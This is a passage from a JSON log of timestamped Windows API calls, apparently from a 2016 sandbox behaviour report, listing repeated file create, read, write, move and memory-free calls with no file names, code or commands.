17:41:51,927", 
"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,927", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,927", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,927", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,927", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:51,927", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,927", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,937", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,937", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,937", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,937", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,937", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,937", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,937", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,937", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,937", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,937", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,937", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,937", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,947", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,947", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,947", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:51,947", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,947", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,947", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,947", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,947", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,947", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,947", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,947", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,947", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,947", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,957", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,957", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,957", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,957", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,957", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,957", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,957", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,957", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,957", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,957", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,957", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:51,967", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,967", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,967", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,967", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,967", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,967", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,967", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,967", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,967", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,967", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,967", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,967", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,977", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,977", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,977", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,977", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,977", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,977", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,977", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,977", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,987", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:51,987", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,987", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,987", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,987", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,987", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,987", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,987", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,987", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,987", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,987", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,987", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,987", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,997", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,997", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,997", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,997", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,997", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,997", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,997", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,997", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,997", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:51,997", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,997", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,997", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,997", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,007", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,007", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,007", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,007", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,007", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,007", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,007", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,007", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,007", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,007", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,007", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,017", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,017", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,017", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,017", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,017", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,017", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,017", 
"api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,017", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,017", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,017", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,017", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,017", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,017", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,027", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,027", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,027", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,027", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,027", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,027", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,027", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,027", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,027", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,027", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,027", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,027", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,027", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,027", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,037", "api": "NtReadFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:52,037", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,037", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,037", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,037", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,037", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,037", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,037", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,037", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,037", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,037", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,037", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,037", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,047", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,047", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,047", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,047", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,047", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,047", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,047", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,047", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,047", "api": "NtWriteFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:52,047", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,047", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,047", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,057", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,057", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,057", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,057", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,057", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,057", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,057", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,057", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,057", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,057", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,057", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,057", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,057", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,057", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,057", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,057", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,067", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,067", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:52,067", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,067", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,067", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,067", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,067", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,067", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,067", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,077", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,077", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,077", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,077", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,077", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,077", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,077", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,077", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,077", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,077", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,077", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,077", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,077", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,077", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,077", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,087", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,087", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,087", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,087", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,087", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,087", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,087", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,087", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,087", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,087", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,087", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,087", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,097", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,097", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,097", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,097", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,097", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,097", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,097", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,097", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,097", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:52,097", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,097", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,097", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,097", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,107", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,107", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,107", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,107", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,107", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,107", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,107", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,107", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,117", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,117", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,117", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,117", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,117", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,117", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,117", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,117", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,117", "api": "NtReadFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:52,117", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,117", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,117", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,117", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,127", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,127", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,127", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,127", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,127", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,127", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,127", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,127", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,127", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,127", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,127", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,137", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,137", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,137", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,137", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,137", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,137", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:52,137", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,137", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,137", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,137", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,137", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,137", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,137", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,147", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,147", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,147", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,147", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,147", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,147", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,147", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,147", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,147", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,147", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,147", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,157", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,157", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,157", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:52,157", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,157", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,157", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,157", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,157", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,157", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,157", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,157", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,157", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,157", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,157", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,157", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,157", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,167", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,167", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,167", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,167", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,167", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,167", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,167", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,167", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,167", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,167", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,167", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,167", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,167", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,177", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,177", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,177", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,177", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,177", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,177", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,177", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,177", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,187", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,187", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,187", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,187", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,187", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,187", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,187", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,187", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 